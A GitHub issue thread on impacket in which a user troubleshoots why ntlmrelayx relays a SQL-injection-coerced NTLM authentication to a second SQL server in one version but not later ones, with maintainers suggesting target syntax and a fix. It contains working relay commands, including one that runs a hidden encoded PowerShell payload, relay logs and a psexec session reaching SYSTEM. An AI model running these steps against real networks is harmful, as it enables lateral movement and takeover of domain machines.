
ntlmrelayx gives different output on different versions #1620

Closed
Althibyani opened this issue Sep 23, 2023 · 6 comments · Fixed by #1741
Labels
waiting for response Further information is needed from people who opened the issue or pull request

Comments

@Althibyani

Configuration

impacket version: v0.11.0 & v0.9.24
Python version: 3

attacker machine: 10.10.10.100 kali linux 2023.3
SQL01 = 10.11.12.21
SQL02 = 10.11.12.22

The idea is as follows:

  • I have SQLi on the SQL01 server. The MSSQL service is running in the context of the sql-svc service account (domain env).

  • The service account SQL-SVC has high privileges on both SQL01 & SQL02 (I added it to the local administrators group).

  • Both machines have signing off.

  • So, by setting up ntlmrelayx.py on kali linux, we can use xp_dirtree to access the \\10.10.10.100\fakeshare share on kali from SQL01 to target SQL02 using ntlmrelayx.py, since sql-svc has high privileges.

  • The normal result is a successful attack that gives me command execution on SQL02.

The problem is, this attack went successfully using Impacket 0.9.24. But it did work using Impacket 0.11.0 & 0.10.0.

In 0.9.24 the relay received the first auth request, which was from the SQL01$ machine account. I know that MSSQL is running in the context of the SQL-SVC user, but I do not know why I received a request from SQL01$ first. However, since it does not have any privileges on SQL02, the next step, which is the command execution, fails.

The good thing in 0.9.24 is that it keeps receiving the second auth request, which this time is from SQL-SVC, and the whole attack succeeds.

But for 0.10.0 & 0.11.0 the attack stopped completely after the first request, which will basically fail to execute because the SQL01$ machine account does not have any privileges on SQL02. Here the attack stops and does not continue to receive the second request like what happened with 0.9.24.

Please check the photos below to understand more.

[screenshot IMG_8878: Impacket 0.11.0 output]

[screenshot IMG_8877: Impacket 0.9.24 output]

So, where is the issue here?

@0xdeaddood (Collaborator)

Hi @Althibyani!

How are you running ntlmrelayx.py in v0.10.0? What flags are you setting?

In that version, we introduced some changes in the default behavior of the example regarding the multi-relay feature. I think your problem might be related to that.

Please check this blog post for more information.

@0xdeaddood 0xdeaddood added the waiting for response Further information is needed from people who opened the issue or pull request label Sep 23, 2023
@Althibyani (Author) commented Sep 23, 2023

Hi @0xdeaddood

I have kali 2023.3 with 2 snapshots: one with Impacket v0.11.0 installed, and one with v0.9.23.

Some versions have been tested on kali 2022.4 as well with the same results.

This was my command on all tested versions (v0.9.24, v0.10.0 & v0.11.0):

proxychains -q ntlmrelayx.py -t ip -smb2support --no-http-server -c "whoami > C:\output.txt"

v0.9.24 = works fine and catches two auths, SQL01$ & SQL-SVC, which is the account needed to complete the attack.

v0.10.0 & v0.11.0 = in both versions, the relay stopped after the first auth ("SQL01$") failed to execute commands, unlike v0.9.24, which continues to relay until it gets the right user, which is SQL-SVC.

@0xdeaddood (Collaborator)

You can try setting a named target (DOMAIN\SQL-SVC@IP)

@Althibyani (Author) commented Oct 6, 2023

> You can try setting a named target (DOMAIN\SQL-SVC@IP)

Hi @0xdeaddood,

Thank you for the reply. I already tried, and I tried again just a few minutes ago.

proxychains -q ntlmrelayx.py -t testlab\sql-svc@10.11.12.22 -smb2support --no-http-server -c "powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByA......[snip]" 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666

[*] Servers started, waiting for connections
[*] SMBD-Thread-4 (process_request_thread): Connection from TESTLAB/SQL01$@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-5 (process_request_thread): Connection from TESTLAB/SQL01$@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-6 (process_request_thread): Connection from TESTLAB/SQL-SVC@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-7 (process_request_thread): Connection from TESTLAB/SQL-SVC@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-8 (process_request_thread): Connection from TESTLAB/SQL-SVC@10.14.15.21 controlled, but there are no more targets left!
[*] SMBD-Thread-9 (process_request_thread): Connection from TESTLAB/SQL-SVC@10.14.15.21 controlled, but there are no more targets left!

The command did not get executed on 10.14.15.21. However, it is still the same result even with different ways; v0.9.23 worked completely fine.

Just to make sure that SQL-SVC already has the privilege to execute commands on 10.11.12.21 and there are no issues in the LAB itself:

└─$ proxychains -q psexec.py testlab/sql-svc@10.11.12.21
Impacket v0.11.0 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 10.11.12.21.....
[*] Found writable share ADMIN$
[*] Uploading file ANElfRhV.exe
[*] Opening SVCManager on 10.11.12.21.....
[*] Creating service zDrv on 10.11.12.21.....
[*] Starting service zDrv.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.4840]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>

@gabrielg5 gabrielg5 self-assigned this Oct 12, 2023
@anadrianmanrique (Contributor)

I think the correct command line args are:
ntlmrelayx.py -t TESTLAB/SQL-SVC@10.11.12.22
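One reason the forward-slash form matters: in the command shown earlier in the thread the target `testlab\sql-svc@10.11.12.22` is typed without quotes, and a POSIX shell treats an unquoted backslash as an escape for the following character, so the program receives `testlabsql-svc@...` with no domain separator at all. The following shell snippet is an added illustration, not code from the thread or from impacket; `received_target` and `split_target` are hypothetical helpers that only show what the shell hands to a program and how a DOMAIN/USER@HOST spec splits into fields.

```shell
#!/bin/sh
# Added example (not impacket's own code). Shows how shell word expansion
# changes a backslash-separated target before ntlmrelayx ever sees it.

# Print the single argument exactly as the shell delivered it to the program.
received_target() {
  printf '%s' "$1"
}

# Split a DOMAIN/USER@HOST or DOMAIN\USER@HOST spec into "domain user host".
# When no domain separator survived, the domain field is printed as "-".
split_target() {
  spec=$1
  host=${spec##*@}
  cred=${spec%@*}
  case $cred in
    */*)   domain=${cred%%/*};  user=${cred#*/} ;;
    *\\*)  domain=${cred%%\\*}; user=${cred#*\\} ;;
    *)     domain=-;            user=$cred ;;
  esac
  printf '%s %s %s' "$domain" "$user" "$host"
}

# Unquoted backslash: the shell removes it, so the domain is lost.
echo "unquoted  : $(received_target testlab\sql-svc@10.11.12.22)"
echo "           -> $(split_target testlab\sql-svc@10.11.12.22)"

# Single quotes preserve the backslash.
echo "quoted    : $(received_target 'testlab\sql-svc@10.11.12.22')"
echo "           -> $(split_target 'testlab\sql-svc@10.11.12.22')"

# Forward slash needs no quoting at all, which is why it is the safer spelling.
echo "slash     : $(received_target testlab/sql-svc@10.11.12.22)"
echo "           -> $(split_target testlab/sql-svc@10.11.12.22)"
```

Whether impacket's own parser accepts the backslash form once it survives the shell is not something this snippet checks; it only demonstrates the shell-side transformation.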

@anadrianmanrique (Contributor)

@Althibyani please recheck after #1741. Thanks
